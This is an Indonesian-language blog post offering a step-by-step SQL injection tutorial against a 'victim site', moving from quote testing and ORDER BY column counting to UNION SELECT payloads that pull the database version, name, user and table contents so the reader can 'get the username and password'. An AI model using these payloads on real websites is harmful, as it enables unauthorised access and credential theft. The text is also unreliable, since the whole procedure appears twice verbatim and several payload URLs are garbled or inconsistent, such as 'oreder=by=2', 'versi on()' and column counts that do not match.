SQL Injection
SQL Injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang di dalamnya menggunakan database untuk penyimpanan data. Atau bisa diartikan teknik mengeksploitasi aplikasi web yang memanfaatkan error messeage yang di hasilkan oleh sql server dikarenakan kesalaha sinteks dalam melakukan query
Untuk mengetahui apakah suatu aplikasi web di serang oleh SQL Injection atau tidak, kita coba dengan menambahkan single quotes (') pada url, contoh :
www.situskorban.com / news.php?id=1 '
Dan jika situs tersebut bisa diinjeksi maka akan keluar pesan eror....@
Dan langsung saja anda cari berapa jumlah table databasenya gunakan syntaks order By dan jangan lupa dengan akhiran /*, #, , atau -
Sebagai contoh :
http://www.situskorban.com/news.php?id=1+order+by+1-
( tidak eror)
http://www.situskorban.com/news.php?id=1+oreder=by=2-
( tidak eror)
http://www.situskorban.com/news.php?id=1+order+by+3-
( tidak eror)
http://www.situskorban.com/news.php?id=1+order+by+4- ada eror yang muncul ( Misalnya ) dan jika belum ada eror yang muncul lanjutkan hingga angka berikutnya.
tes diatas memperlihatkan bahawa table database dari situs korban adalah 3 karena ketika anda memasukan angka 4 menjadi eror.
Selanjutnya gunakan Union Function untuk mencari angka mana yang bisa kita injection lebih lanjut
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11-
lalu anda cari informasi lebih lanjut tentang database korban, Misalnya untuk mencari Versi database yang digunakan anda gunakan.
http://www.situskorban.com/news.php.?id=null+union+select+1,2,3,4,versi on(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Unutk mengetahui nama database situs korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Untuk mengetahui Username dari database Korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Untuk mengetahui Isi database situs korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,column,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+table-
Selanjutnya tinggal anda melanjutkan mmbuka table - table databasenya dengan menggunakan nama dan dapatkan username dan passwordnya
Dan bersenang-senanglah
Huh.... ngetik artikel ini benar-benar lelah ya udah cukup sampai di sini aja lah...
Untuk mengetahui apakah suatu aplikasi web di serang oleh SQL Injection atau tidak, kita coba dengan menambahkan single quotes (') pada url, contoh :
www.situskorban.com / news.php?id=1 '
Dan jika situs tersebut bisa diinjeksi maka akan keluar pesan eror....@
Dan langsung saja anda cari berapa jumlah table databasenya gunakan syntaks order By dan jangan lupa dengan akhiran /*, #, , atau -
Sebagai contoh :
http://www.situskorban.com/news.php?id=1+order+by+1-
( tidak eror)
http://www.situskorban.com/news.php?id=1+oreder=by=2-
( tidak eror)
http://www.situskorban.com/news.php?id=1+order+by+3-
( tidak eror)
http://www.situskorban.com/news.php?id=1+order+by+4- ada eror yang muncul ( Misalnya ) dan jika belum ada eror yang muncul lanjutkan hingga angka berikutnya.
tes diatas memperlihatkan bahawa table database dari situs korban adalah 3 karena ketika anda memasukan angka 4 menjadi eror.
Selanjutnya gunakan Union Function untuk mencari angka mana yang bisa kita injection lebih lanjut
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11-
lalu anda cari informasi lebih lanjut tentang database korban, Misalnya untuk mencari Versi database yang digunakan anda gunakan.
http://www.situskorban.com/news.php.?id=null+union+select+1,2,3,4,versi on(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Unutk mengetahui nama database situs korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Untuk mengetahui Username dari database Korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-
Untuk mengetahui Isi database situs korban
http://www.situskorban.com/news.php?id=null+union+select+1,2,3,4,column,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+table-
Selanjutnya tinggal anda melanjutkan mmbuka table - table databasenya dengan menggunakan nama dan dapatkan username dan passwordnya
Dan bersenang-senanglah
Huh.... ngetik artikel ini benar-benar lelah ya udah cukup sampai di sini aja lah...
Assalammualaikum Wr.Wb
diposting oleh Unknown @ 08.03
0 Komentar
0 Komentar:
Posting Komentar
Berlangganan Posting Komentar [Atom]
<< Beranda